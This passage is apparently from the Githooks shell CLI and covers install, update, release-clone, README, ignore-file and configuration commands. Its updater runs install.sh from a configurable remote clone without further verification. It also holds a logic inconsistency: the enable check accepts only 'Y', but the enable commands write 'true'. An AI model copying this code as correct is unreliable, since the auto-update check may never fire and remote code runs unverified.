            [ -d "$SHARED_ROOT" ] &&
                rm -rf "$SHARED_ROOT" &&
                mkdir -p "$SHARED_ROOT"
            if [ -n "$SHARED_REPO_CLONE_BRANCH" ]; then
                # shellcheck disable=SC2086
                CLONE_OUTPUT=$(git clone \
                    -c core.hooksPath=/dev/null \
                    --template=/dev/null \
                    --single-branch \
                    --branch "$SHARED_REPO_CLONE_BRANCH" \
                    $ADD_ARGS \
                    "$SHARED_REPO_CLONE_URL" \
                    "$SHARED_ROOT" 2>&1)
            else
                # shellcheck disable=SC2086
                CLONE_OUTPUT=$(git clone \
                    -c core.hooksPath=/dev/null \
                    --template=/dev/null \
                    --single-branch \
                    $ADD_ARGS \
                    "$SHARED_REPO_CLONE_URL" \
                    "$SHARED_ROOT" 2>&1)
            fi
            # shellcheck disable=SC2181
            if [ $? -ne 0 ]; then
                echo "! Clone failed, git clone output:" >&2
                echo "$CLONE_OUTPUT" >&2
            fi
        fi
        IFS="$IFS_NEWLINE"
    done
    unset IFS
}
#####################################################
# Executes an ondemand installation
# of the latest Githooks version.
#
# Returns:
# 1 if the installation fails,
# 0 otherwise
#####################################################
run_ondemand_installation() {
    # `git hooks install [--global]` entry point: fetches the latest
    # release and runs its installer (single-repo unless `--global`).
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks install [--global]
Installs the Githooks hooks into the current repository.
If the \`--global\` flag is given, it executes the installation
globally, including the hook templates for future repositories.
"
        return
    fi
    case "$1" in
    "")
        INSTALL_FLAGS="--single"
        ;;
    "--global")
        INSTALL_FLAGS=""
        ;;
    *)
        echo "! Invalid argument: \`$1\`" >&2 && exit 1
        ;;
    esac
    if ! fetch_latest_updates; then
        echo "! Failed to fetch the latest install script" >&2
        echo " You can retry manually using one of the alternative methods," >&2
        echo " see them here: https://github.com/rycus86/githooks#installation" >&2
        exit 1
    fi
    # shellcheck disable=SC2086
    if ! execute_install_script $INSTALL_FLAGS; then
        echo "! Failed to execute the installation" >&2
        exit 1
    fi
}
#####################################################
# Executes an ondemand uninstallation of Githooks.
#
# Returns:
# 1 if the uninstallation fails,
# 0 otherwise
#####################################################
run_ondemand_uninstallation() {
    # `git hooks uninstall [--global]` entry point: runs the bundled
    # uninstaller (single-repo unless `--global`).
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks uninstall [--global]
Uninstalls the Githooks hooks from the current repository.
If the \`--global\` flag is given, it executes the uninstallation
globally, including the hook templates and all local repositories.
"
        return
    fi
    case "$1" in
    "")
        UNINSTALL_ARGS="--single"
        ;;
    "--global")
        UNINSTALL_ARGS="--global"
        ;;
    *)
        echo "! Invalid argument: \`$1\`" >&2 && exit 1
        ;;
    esac
    if ! execute_uninstall_script $UNINSTALL_ARGS; then
        echo "! Failed to execute the uninstallation" >&2
        exit 1
    fi
}
#####################################################
# Executes an update check, and potentially
# the installation of the latest version.
#
# Returns:
# 1 if the latest version cannot be retrieved,
# 0 otherwise
#####################################################
run_update_check() {
    # `git hooks update [force|enable|disable]` entry point.
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks update [force]
git hooks update [enable|disable]
Executes an update check for a newer Githooks version.
If it finds one, or if \`force\` was given, the downloaded
install script is executed for the latest version.
The \`enable\` and \`disable\` options enable or disable
the automatic checks that would normally run daily
after a successful commit event.
"
        return 0
    fi
    if [ "$1" = "enable" ]; then
        git config --global githooks.autoupdate.enabled true &&
            echo "Automatic update checks have been enabled" &&
            return 0
        echo "! Failed to enable automatic updates" >&2 && exit 1
    elif [ "$1" = "disable" ]; then
        git config --global githooks.autoupdate.enabled false &&
            echo "Automatic update checks have been disabled" &&
            return 0
        echo "! Failed to disable automatic updates" >&2 && exit 1
    elif [ -n "$1" ] && [ "$1" != "force" ]; then
        echo "! Invalid operation: \`$1\`" >&2 && exit 1
    fi
    record_update_time
    if ! fetch_latest_updates; then
        echo "! Failed to check for updates: cannot fetch updates"
        exit 1
    fi
    # Without `force`, stop early when no newer version was fetched.
    if [ "$1" != "force" ]; then
        if ! is_update_available; then
            echo " Githooks is already on the latest version"
            return 0
        fi
    fi
    # NOTE(review): INSTALL_FLAGS is never assigned in this function, so
    # it usually expands to nothing here (or leaks from an earlier caller
    # in the same process) — confirm whether specific flags were intended.
    # shellcheck disable=SC2086
    if ! execute_install_script $INSTALL_FLAGS; then
        echo "! Failed to execute the installation"
        print_update_disable_info
        return 1
    fi
    return 0
}
#####################################################
# Saves the last update time into the
# githooks.autoupdate.lastrun global Git config.
#
# Returns:
# None
#####################################################
record_update_time() {
    # Remember the current Unix timestamp as the last auto-update check.
    LAST_UPDATE_TIMESTAMP=$(date +%s)
    git config --global githooks.autoupdate.lastrun "$LAST_UPDATE_TIMESTAMP"
}
#####################################################
# Returns the script path e.g. `run` for the app
# `$1`
#
# Returns:
# 0 and "$INSTALL_DIR/tools/$1/run"
# 1 and "" otherwise
#####################################################
get_tool_script() {
    # Prints the runner script path for tool "$1" and returns 0 when it
    # is installed under "$INSTALL_DIR/tools"; returns 1 otherwise.
    TOOL_RUNNER="$INSTALL_DIR/tools/$1/run"
    if [ ! -f "$TOOL_RUNNER" ]; then
        return 1
    fi
    echo "$TOOL_RUNNER"
    return 0
}
#####################################################
# Call a script "$1". If it is not executable
# call it as a shell script.
#
# Returns:
# Error code of the script.
#####################################################
call_script() {
    # Runs script "$1" directly when it is executable, otherwise via
    # `sh`; remaining arguments are forwarded. Returns the script's
    # exit code.
    SCRIPT="$1"
    shift
    if [ -x "$SCRIPT" ]; then
        "$SCRIPT" "$@"
        CALL_SCRIPT_RESULT=$?
    else
        sh "$SCRIPT" "$@"
        CALL_SCRIPT_RESULT=$?
    fi
    return $CALL_SCRIPT_RESULT
}
#####################################################
# Does a update clone repository exist in the
# install folder
#
# Returns: 0 if `true`, 1 otherwise
#####################################################
is_release_clone_existing() {
    # `rev-parse` succeeds only inside a valid (possibly bare) Git repo.
    if ! git -C "$INSTALL_DIR/release" rev-parse >/dev/null 2>&1; then
        return 1
    fi
    return 0
}
#####################################################
# Checks if there is an update in the release clone
# waiting for a fast-forward merge.
#
# Returns:
# 0 if an update needs to be applied, 1 otherwise
#####################################################
is_update_available() {
    # Reflects the flag set by a preceding fetch_latest_updates call.
    if [ "$GITHOOKS_CLONE_UPDATE_AVAILABLE" = "true" ]; then
        return 0
    fi
    return 1
}
#####################################################
# Fetches updates in the release clone.
# If the release clone is newly created the variable
# `$GITHOOKS_CLONE_CREATED` is set to
# `true`
# If an update is available
# `GITHOOKS_CLONE_UPDATE_AVAILABLE` is set to `true`
#
# Returns:
# 1 if failed, 0 otherwise
#####################################################
fetch_latest_updates() {
    # Ensures the release clone in $GITHOOKS_CLONE_DIR exists, matches
    # the configured URL/branch and has its origin fetched.
    # Sets GITHOOKS_CLONE_CREATED and GITHOOKS_CLONE_UPDATE_AVAILABLE.
    # Returns 0 on success, 1 on any failure.
    echo "^ Checking for updates ..."
    GITHOOKS_CLONE_CREATED="false"
    GITHOOKS_CLONE_UPDATE_AVAILABLE="false"
    # Fix: initialize explicitly — the variable is a shell global, so a
    # `true` value leaking in from a previous call could otherwise force
    # an unnecessary reclone on the happy path below.
    CREATE_NEW_CLONE="false"
    GITHOOKS_CLONE_URL=$(git config --global githooks.cloneUrl)
    GITHOOKS_CLONE_BRANCH=$(git config --global githooks.cloneBranch)
    # We do a fresh clone if there is not a repository
    # or wrong url/branch configured and the user agrees.
    if is_git_repo "$GITHOOKS_CLONE_DIR"; then
        URL=$(execute_git "$GITHOOKS_CLONE_DIR" config remote.origin.url 2>/dev/null)
        BRANCH=$(execute_git "$GITHOOKS_CLONE_DIR" symbolic-ref -q --short HEAD 2>/dev/null)
        if [ "$URL" != "$GITHOOKS_CLONE_URL" ] ||
            [ "$BRANCH" != "$GITHOOKS_CLONE_BRANCH" ]; then
            CREATE_NEW_CLONE="false"
            echo "! Cannot fetch updates because \`origin\` of update clone" >&2
            echo " \`$GITHOOKS_CLONE_DIR\`" >&2
            echo " points to url:" >&2
            echo " \`$URL\`" >&2
            echo " on branch \`$BRANCH\`" >&2
            echo " which is not configured." >&2
            # Interactive prompt: reads the answer from the terminal.
            echo "Do you want to delete and reclone the existing update clone? [N/y]"
            read -r ANSWER </dev/tty
            if [ "$ANSWER" = "y" ] || [ "$ANSWER" = "Y" ]; then
                CREATE_NEW_CLONE="true"
            fi
            if [ "$CREATE_NEW_CLONE" != "true" ]; then
                echo "! See \`git hooks config [set|print] clone-url\` and" >&2
                echo " \`git hooks config [set|print] clone-branch\`" >&2
                echo " Either fix this or delete the clone" >&2
                echo " \`$GITHOOKS_CLONE_DIR\`" >&2
                echo " to trigger a new checkout." >&2
                return 1
            fi
        fi
        # Check if the update clone is dirty which it really should not.
        if ! execute_git "$GITHOOKS_CLONE_DIR" diff-index --quiet HEAD >/dev/null 2>&1; then
            echo "! Cannot pull updates because the update clone" >&2
            echo " \`$GITHOOKS_CLONE_DIR\`" >&2
            echo " is dirty!" >&2
            echo "Do you want to delete and reclone the existing update clone? [N/y]"
            read -r ANSWER </dev/tty
            if [ "$ANSWER" = "y" ] || [ "$ANSWER" = "Y" ]; then
                CREATE_NEW_CLONE="true"
            fi
            if [ "$CREATE_NEW_CLONE" != "true" ]; then
                echo "! Either fix this or delete the clone" >&2
                echo " \`$GITHOOKS_CLONE_DIR\`" >&2
                echo " to trigger a new checkout." >&2
                return 1
            fi
        fi
    else
        CREATE_NEW_CLONE="true"
    fi
    if [ "$CREATE_NEW_CLONE" = "true" ]; then
        clone_release_repository || return 1
        # A fresh clone always counts as an available update;
        # install.sh deals with applying it.
        # shellcheck disable=SC2034
        GITHOOKS_CLONE_CREATED="true"
        GITHOOKS_CLONE_UPDATE_AVAILABLE="true"
    else
        FETCH_OUTPUT=$(
            execute_git "$GITHOOKS_CLONE_DIR" fetch origin "$GITHOOKS_CLONE_BRANCH" 2>&1
        )
        # shellcheck disable=SC2181
        if [ $? -ne 0 ]; then
            echo "! Fetching updates in \`$GITHOOKS_CLONE_DIR\` failed with:" >&2
            echo "$FETCH_OUTPUT" >&2
            return 1
        fi
        # Compare the local branch head against the fetched origin head.
        RELEASE_COMMIT=$(execute_git "$GITHOOKS_CLONE_DIR" rev-parse "$GITHOOKS_CLONE_BRANCH")
        UPDATE_COMMIT=$(execute_git "$GITHOOKS_CLONE_DIR" rev-parse "origin/$GITHOOKS_CLONE_BRANCH")
        if [ "$RELEASE_COMMIT" != "$UPDATE_COMMIT" ]; then
            # We have an update available
            # install.sh deals with updating ...
            GITHOOKS_CLONE_UPDATE_AVAILABLE="true"
        fi
    fi
    return 0
}
############################################################
# Checks whether the given directory
# is a Git repository (bare included) or not.
#
# Returns:
# 1 if failed, 0 otherwise
############################################################
is_git_repo() {
    # `rev-parse` succeeds only inside a Git repository (bare included).
    if git -C "$1" rev-parse >/dev/null 2>&1; then
        return 0
    fi
    return 1
}
############################################################
# Checks whether the given directory
# is a Git bare repository.
#
# Returns:
# 1 if failed, 0 otherwise
############################################################
is_bare_repo() {
    # Succeeds only when git itself reports the directory as bare.
    BARE_CHECK_RESULT=$(git -C "$1" rev-parse --is-bare-repository 2>/dev/null)
    if [ "$BARE_CHECK_RESULT" = "true" ]; then
        return 0
    fi
    return 1
}
#####################################################
# Safely execute a git command in the standard
# clone dir `$1`.
#
# Returns: Error code from `git`
#####################################################
execute_git() {
    # Runs a git command in repository "$1", forwarding the remaining
    # arguments. Hooks are disabled via `core.hooksPath=/dev/null` so
    # Githooks never triggers itself while operating on its own clones.
    REPO="$1"
    shift
    git -C "$REPO" \
    --work-tree="$REPO" \
    --git-dir="$REPO/.git" \
    -c core.hooksPath=/dev/null \
    "$@"
}
#####################################################
# Creates the release clone if needed.
# Returns:
# 1 if failed, 0 otherwise
#####################################################
assert_release_clone() {
    # Nothing to do when a release clone is already present.
    if is_git_repo "$GITHOOKS_CLONE_DIR"; then
        return 0
    fi
    # We do a fresh clone if there is no clone
    clone_release_repository || return 1
    return 0
}
############################################################
# Clone the URL `$GITHOOKS_CLONE_URL` into the install
# folder `$INSTALL_DIR/release` for further updates.
#
# Returns: 0 if succesful, 1 otherwise
############################################################
clone_release_repository() {
    GITHOOKS_CLONE_URL=$(git config --global githooks.cloneUrl)
    GITHOOKS_CLONE_BRANCH=$(git config --global githooks.cloneBranch)
    # Fall back to the upstream repository and branch when unconfigured.
    if [ -z "$GITHOOKS_CLONE_URL" ]; then
        GITHOOKS_CLONE_URL="https://github.com/rycus86/githooks.git"
    fi
    if [ -z "$GITHOOKS_CLONE_BRANCH" ]; then
        GITHOOKS_CLONE_BRANCH="master"
    fi
    # Start from a clean target directory.
    if [ -d "$GITHOOKS_CLONE_DIR" ]; then
        if ! rm -rf "$GITHOOKS_CLONE_DIR" >/dev/null 2>&1; then
            echo "! Failed to remove an existing githooks release repository" >&2
            return 1
        fi
    fi
    echo "Cloning \`$GITHOOKS_CLONE_URL\` to \`$GITHOOKS_CLONE_DIR\` ..."
    # Shallow single-branch clone; hook templates and hooksPath are
    # disabled so the clone itself never runs any Git hooks.
    CLONE_OUTPUT=$(git clone \
    -c core.hooksPath=/dev/null \
    --template=/dev/null \
    --depth=1 \
    --single-branch \
    --branch "$GITHOOKS_CLONE_BRANCH" \
    "$GITHOOKS_CLONE_URL" "$GITHOOKS_CLONE_DIR" 2>&1)
    # shellcheck disable=SC2181
    if [ $? -ne 0 ]; then
        echo "! Cloning \`$GITHOOKS_CLONE_URL\` to \`$GITHOOKS_CLONE_DIR\` failed with output: " >&2
        echo "$CLONE_OUTPUT" >&2
        return 1
    fi
    # Persist the effective values, including applied defaults.
    git config --global githooks.cloneUrl "$GITHOOKS_CLONE_URL"
    git config --global githooks.cloneBranch "$GITHOOKS_CLONE_BRANCH"
    return 0
}
#####################################################
# Checks if updates are enabled.
#
# Returns:
# 0 if updates are enabled, 1 otherwise
#####################################################
is_autoupdate_enabled() {
    # Auto-updates are on only when the global config value is exactly "Y".
    AUTOUPDATE_CONFIG=$(git config --global githooks.autoupdate.enabled)
    if [ "$AUTOUPDATE_CONFIG" = "Y" ]; then
        return 0
    fi
    return 1
}
#####################################################
# Performs the installation of the previously
# fetched install script.
#
# Returns:
# 0 if the installation was successful, 1 otherwise
#####################################################
execute_install_script() {
    # The release clone must exist before its installer can be run.
    if ! assert_release_clone; then
        echo "! Could not create a release clone in \`$GITHOOKS_CLONE_DIR\`" >&2
        exit 1
    fi
    # Set the install script
    INSTALL_SCRIPT="$INSTALL_DIR/release/install.sh"
    if [ ! -f "$INSTALL_SCRIPT" ]; then
        echo "! Non-existing \`install.sh\` in \`$INSTALL_DIR/release\`" >&2
        return 1
    fi
    # Feed the script to a fresh `sh` on stdin; `--` makes "$@" the
    # script's positional arguments.
    sh -s -- "$@" <"$INSTALL_SCRIPT" || return 1
    return 0
}
#####################################################
# Performs the uninstallation using the previously
#   fetched release clone's uninstall script.
#
# Returns:
#   0 if the uninstallation was successful,
#   1 otherwise
#####################################################
execute_uninstall_script() {
    # Locate the previously fetched uninstall script.
    UNINSTALL_SCRIPT="$INSTALL_DIR/release/uninstall.sh"
    [ -f "$UNINSTALL_SCRIPT" ] || {
        echo "! Non-existing \`uninstall.sh\` in \`$INSTALL_DIR/release\`" >&2
        return 1
    }

    # Run it through `sh` on stdin, forwarding all arguments after `--`.
    if sh -s -- "$@" <"$UNINSTALL_SCRIPT"; then
        return 0
    fi
    return 1
}
#####################################################
# Prints some information on how to disable
#   automatic update checks.
#
# Returns:
#   None
#####################################################
print_update_disable_info() {
    printf '%s\n' " If you would like to disable auto-updates, run:"
    printf '%s\n' " \$ git hooks update disable"
}
#####################################################
# Adds or updates the Githooks README in
#   the current local repository.
#
# Returns:
#   1 on failure, 0 otherwise
#####################################################
manage_readme_file() {
    # Decide whether an already existing README may be overwritten.
    case "$1" in
    "add")
        FORCE_README=""
        ;;
    "update")
        FORCE_README="y"
        ;;
    *)
        print_help_header
        echo "
git hooks readme [add|update]
Adds or updates the Githooks README in the \`.githooks\` folder.
If \`add\` is used, it checks first if there is a README file already.
With \`update\`, the file is always updated, creating it if necessary.
This command needs to be run at the root of a repository.
"
        if [ "$1" = "help" ]; then
            exit 0
        else
            exit 1
        fi
        ;;
    esac

    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi

    if [ -f .githooks/README.md ] && [ "$FORCE_README" != "y" ]; then
        echo "! This repository already seems to have a Githooks README." >&2
        echo " If you would like to replace it with the latest one, please run \`git hooks readme update\`" >&2
        exit 1
    fi

    if ! assert_release_clone; then
        exit 1
    fi

    README_FILE="$INSTALL_DIR/release/.githooks/README.md"

    # Copy the latest README from the release clone into the repository.
    # BUGFIX: the previous chained `a && b && c || echo` form always
    # returned 0 (the trailing echo succeeded), even when the copy
    # failed - contradicting the documented "1 on failure" contract.
    if mkdir -p "$(pwd)/.githooks" &&
        cat "$README_FILE" >"$(pwd)/.githooks/README.md"; then
        echo "The README file is updated."
        echo_if_non_bare_repo " Do not forget to commit and push it!"
    else
        echo "! Failed to update the README file in the current repository" >&2
        return 1
    fi
}
#####################################################
# Adds or updates Githooks ignore files in
#   the current local repository.
#
# Returns:
#   1 on failure, 0 otherwise
#####################################################
manage_ignore_files() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks ignore [pattern...]
git hooks ignore [trigger] [pattern...]
Adds new file name patterns to the Githooks \`.ignore\` file, either
in the main \`.githooks\` folder, or in the Git event specific one.
Note, that it may be required to surround the individual pattern
parameters with single quotes to avoid expanding or splitting them.
The \`trigger\` parameter should be the name of the Git event if given.
This command needs to be run at the root of a repository.
"
        return
    fi

    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi

    # Known Git hook trigger names: a leading trigger argument selects
    # the event-specific ignore file instead of the main one.
    TRIGGER_TYPES="
applypatch-msg pre-applypatch post-applypatch
pre-commit prepare-commit-msg commit-msg post-commit
pre-rebase post-checkout post-merge pre-push
pre-receive update post-receive post-update
push-to-checkout pre-auto-gc post-rewrite sendemail-validate"

    TARGET_DIR="$(pwd)/.githooks"

    for TRIGGER_TYPE in $TRIGGER_TYPES; do
        if [ "$1" = "$TRIGGER_TYPE" ]; then
            TARGET_DIR="$(pwd)/.githooks/$TRIGGER_TYPE"
            shift
            break
        fi
    done

    if [ -z "$1" ]; then
        manage_ignore_files "help"
        echo "! Missing pattern parameter" >&2
        exit 1
    fi

    # BUGFIX: the previous `if ! mkdir -p "$TARGET_DIR" && touch ...` form
    # negated only the mkdir, so the error was reported only when mkdir
    # failed AND touch then succeeded, and on the success path the touch
    # never ran at all. Fail if either preparation step fails.
    if ! mkdir -p "$TARGET_DIR" || ! touch "$TARGET_DIR/.ignore"; then
        echo "! Failed to prepare the ignore file at $TARGET_DIR/.ignore" >&2
        exit 1
    fi

    # Separate the new patterns from any existing content.
    [ -f "$TARGET_DIR/.ignore" ] &&
        echo "" >>"$TARGET_DIR/.ignore"

    for PATTERN in "$@"; do
        if ! echo "$PATTERN" >>"$TARGET_DIR/.ignore"; then
            echo "! Failed to update the ignore file at $TARGET_DIR/.ignore" >&2
            exit 1
        fi
    done

    echo "The ignore file at $TARGET_DIR/.ignore is updated"
    echo_if_non_bare_repo " Do not forget to commit the changes!"
}
#####################################################
# Manages various Githooks settings,
#   that is stored in Git configuration.
#
# Returns:
#   1 on failure, 0 otherwise
#####################################################
manage_configuration() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks config list [--local|--global]
Lists the Githooks related settings of the Githooks configuration.
Can be either global or local configuration, or both by default.
git hooks config [set|reset|print] disable
Disables running any Githooks files in the current repository,
when the \`set\` option is used.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
This command needs to be run at the root of a repository.
[deprecated] git hooks config [set|reset|print] single
This command is deprecated and will be removed in the future.
Marks the current local repository to be managed as a single Githooks
installation, or clears the marker, with \`set\` and \`reset\` respectively.
The \`print\` option outputs the current setting of it.
This command needs to be run at the root of a repository.
git hooks config set search-dir <path>
git hooks config [reset|print] search-dir
Changes the previous search directory setting used during installation.
The \`set\` option changes the value, and the \`reset\` option clears it.
The \`print\` option outputs the current setting of it.
git hooks config set shared [--local] <git-url...>
git hooks config [reset|print] shared [--local]
Updates the list of global (or local) shared hook repositories when
the \`set\` option is used, which accepts multiple <git-url> arguments,
each containing a clone URL of a hook repository.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
git hooks config [accept|deny|reset|print] trusted
Accepts changes to all existing and new hooks in the current repository
when the trust marker is present and the \`set\` option is used.
The \`deny\` option marks the repository as
it has refused to trust the changes, even if the trust marker is present.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
This command needs to be run at the root of a repository.
git hooks config [enable|disable|reset|print] update
Enables or disables automatic update checks with
the \`enable\` and \`disable\` options respectively.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
git hooks config set clone-url <git-url>
git hooks config [set|print] clone-url
Sets or prints the configured githooks clone url used
for any update.
git hooks config set clone-branch <branch-name>
git hooks config print clone-branch
Sets or prints the configured branch of the update clone
used for any update.
git hooks config [reset|print] update-time
Resets the last Githooks update time with the \`reset\` option,
causing the update check to run next time if it is enabled.
Use \`git hooks update [enable|disable]\` to change that setting.
The \`print\` option outputs the current value of it.
git hooks config [enable|disable|print] fail-on-non-existing-shared-hooks [--local|--global]
Enable or disable failing hooks with an error when any
shared hooks configured in \`.shared\` are missing,
which usually means \`git hooks update\` has not been called yet.
git hooks config [yes|no|reset|print] delete-detected-lfs-hooks
By default, detected LFS hooks during install are disabled and backed up.
The \`yes\` option remembers to always delete these hooks.
The \`no\` option remembers the default behavior.
The decision is reset with \`reset\` to the default behavior.
The \`print\` option outputs the current behavior.
"
        return
    fi

    CONFIG_OPERATION="$1"

    # `list` is handled inline: dump all githooks-related settings
    # (optionally restricted by a --local/--global scope flag in $2).
    if [ "$CONFIG_OPERATION" = "list" ]; then
        if [ "$2" = "--local" ] && ! is_running_in_git_repo_root; then
            echo "! Local configuration can only be printed from a Git repository" >&2
            exit 1
        fi

        if [ -z "$2" ]; then
            git config --get-regexp "(^githooks|alias.hooks)" | sort
        else
            git config "$2" --get-regexp "(^githooks|alias.hooks)" | sort
        fi
        exit $?
    fi

    CONFIG_ARGUMENT="$2"

    # Drop the operation and the option name; any remaining positional
    # arguments are forwarded to the option-specific handler below.
    [ "$#" -ge 1 ] && shift
    [ "$#" -ge 1 ] && shift

    # Dispatch to the per-option handler, passing the operation first.
    case "$CONFIG_ARGUMENT" in
    "disable")
        config_disable "$CONFIG_OPERATION"
        ;;
    "search-dir")
        config_search_dir "$CONFIG_OPERATION" "$@"
        ;;
    "shared")
        config_shared_hook_repos "$CONFIG_OPERATION" "$@"
        ;;
    "trusted")
        config_trust_all_hooks "$CONFIG_OPERATION"
        ;;
    "update")
        config_update_state "$CONFIG_OPERATION" "$@"
        ;;
    "clone-url")
        config_update_clone_url "$CONFIG_OPERATION" "$@"
        ;;
    "clone-branch")
        config_update_clone_branch "$CONFIG_OPERATION" "$@"
        ;;
    "update-time")
        config_update_last_run "$CONFIG_OPERATION"
        ;;
    "fail-on-non-existing-shared-hooks")
        config_fail_on_not_existing_shared_hooks "$CONFIG_OPERATION" "$@"
        ;;
    "delete-detected-lfs-hooks")
        config_delete_detected_lfs_hooks "$CONFIG_OPERATION" "$@"
        ;;
    *)
        manage_configuration "help"
        echo "! Invalid configuration option: \`$CONFIG_ARGUMENT\`" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages Githooks disable settings for
#   the current repository.
# Prints or modifies the `githooks.disable`
#   local Git configuration.
#####################################################
config_disable() {
    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi

    case "$1" in
    "set")
        git config githooks.disable true
        ;;
    "reset")
        git config --unset githooks.disable
        ;;
    "print")
        if is_repository_disabled; then
            echo "Githooks is disabled in the current repository"
        else
            echo "Githooks is NOT disabled in the current repository"
        fi
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`set\`, \`reset\` or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the previous search directory setting
#   used during Githooks installation.
# Prints or modifies the
#   `githooks.previousSearchDir`
#   global Git configuration.
#####################################################
config_search_dir() {
    case "$1" in
    "set")
        if [ -z "$2" ]; then
            manage_configuration "help"
            echo "! Missing <path> parameter" >&2
            exit 1
        fi
        git config --global githooks.previousSearchDir "$2"
        ;;
    "reset")
        git config --global --unset githooks.previousSearchDir
        ;;
    "print")
        CONFIG_SEARCH_DIR=$(git config --global --get githooks.previousSearchDir)
        if [ -z "$CONFIG_SEARCH_DIR" ]; then
            echo "No previous search directory is set"
        else
            echo "Search directory is set to: $CONFIG_SEARCH_DIR"
        fi
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`set\`, \`reset\` or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the shared hook repository list setting.
# Prints or modifies the `githooks.shared`
#   global (or, with --local, repository-local)
#   Git configuration.
#####################################################
config_shared_hook_repos() {
    if [ "$1" = "set" ]; then
        SHARED_TYPE="--global"
        # An optional --local flag stores the URLs in the repo config.
        [ "$2" = "--local" ] && SHARED_TYPE="$2" && shift
        if [ -z "$2" ]; then
            manage_configuration "help"
            echo "! Missing <git-url> parameter" >&2
            exit 1
        fi
        shift
        for SHARED_REPO_ITEM in "$@"; do
            git config "$SHARED_TYPE" --add githooks.shared "$SHARED_REPO_ITEM"
        done
    elif [ "$1" = "reset" ]; then
        SHARED_TYPE="--global"
        if echo "$2" | grep -qE "\-\-(local)"; then
            SHARED_TYPE="$2"
        elif [ -n "$2" ]; then
            manage_configuration "help"
            echo "! Wrong argument \`$2\`" >&2
        fi
        git config "$SHARED_TYPE" --unset-all githooks.shared
    elif [ "$1" = "print" ]; then
        SHARED_TYPE="--global"
        if echo "$2" | grep -qE "\-\-(local)"; then
            SHARED_TYPE="$2"
        elif [ -n "$2" ]; then
            manage_configuration "help"
            # BUGFIX: this previously used `$($2)` (command substitution),
            # which executed the user-supplied argument as a command
            # instead of quoting it in the message.
            echo "! Wrong argument \`$2\`" >&2
        fi
        list_shared_hook_repos "$SHARED_TYPE"
    else
        manage_configuration "help"
        echo "! Invalid operation: \`$1\` (use \`set\`, \`reset\` or \`print\`)" >&2
        exit 1
    fi
}
#####################################################
# Manages the trust-all-hooks setting
#   for the current repository.
# Prints or modifies the `githooks.trust.all`
#   local Git configuration.
#####################################################
config_trust_all_hooks() {
    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi

    case "$1" in
    "accept")
        git config githooks.trust.all Y
        ;;
    "deny")
        git config githooks.trust.all N
        ;;
    "reset")
        git config --unset githooks.trust.all
        ;;
    "print")
        CONFIG_TRUST_ALL=$(git config --local --get githooks.trust.all)
        if [ "$CONFIG_TRUST_ALL" = "Y" ]; then
            echo "The current repository trusts all hooks automatically"
        elif [ -z "$CONFIG_TRUST_ALL" ]; then
            echo "The current repository does NOT have trust settings"
        else
            echo "The current repository does NOT trust hooks automatically"
        fi
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`accept\`, \`deny\`, \`reset\` or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the automatic update check setting.
# Prints or modifies the
#   `githooks.autoupdate.enabled`
#   global Git configuration.
#####################################################
config_update_state() {
    case "$1" in
    "enable")
        git config --global githooks.autoupdate.enabled true
        ;;
    "disable")
        git config --global githooks.autoupdate.enabled false
        ;;
    "reset")
        git config --global --unset githooks.autoupdate.enabled
        ;;
    "print")
        CONFIG_UPDATE_ENABLED=$(git config --get githooks.autoupdate.enabled)
        # "Y" is also accepted here - presumably written by older
        # versions; confirm before removing.
        if [ "$CONFIG_UPDATE_ENABLED" = "true" ] ||
            [ "$CONFIG_UPDATE_ENABLED" = "Y" ]; then
            echo "Automatic update checks are enabled"
        else
            echo "Automatic update checks are NOT enabled"
        fi
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`enable\`, \`disable\`, \`reset\` or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the automatic update clone url.
# Prints or modifies the
#   `githooks.cloneUrl`
#   global Git configuration.
#####################################################
config_update_clone_url() {
    case "$1" in
    "print")
        echo "Update clone url set to: $(git config --global githooks.cloneUrl)"
        ;;
    "set")
        if [ -z "$2" ]; then
            echo "! No valid url given" >&2
            exit 1
        fi
        git config --global githooks.cloneUrl "$2"
        config_update_clone_url "print"
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`set\`, or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the automatic update clone branch.
# Prints or modifies the
#   `githooks.cloneBranch`
#   global Git configuration.
#####################################################
config_update_clone_branch() {
    case "$1" in
    "print")
        echo "Update clone branch set to: $(git config --global githooks.cloneBranch)"
        ;;
    "set")
        if [ -z "$2" ]; then
            echo "! No valid branch name given" >&2
            exit 1
        fi
        git config --global githooks.cloneBranch "$2"
        config_update_clone_branch "print"
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`set\`, or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the timestamp for the last update check.
# Prints or modifies the
#   `githooks.autoupdate.lastrun`
#   global Git configuration.
#####################################################
config_update_last_run() {
    if [ "$1" = "reset" ]; then
        git config --global --unset githooks.autoupdate.lastrun
    elif [ "$1" = "print" ]; then
        LAST_UPDATE=$(git config --global --get githooks.autoupdate.lastrun)
        if [ -z "$LAST_UPDATE" ]; then
            echo "The update has never run"
        else
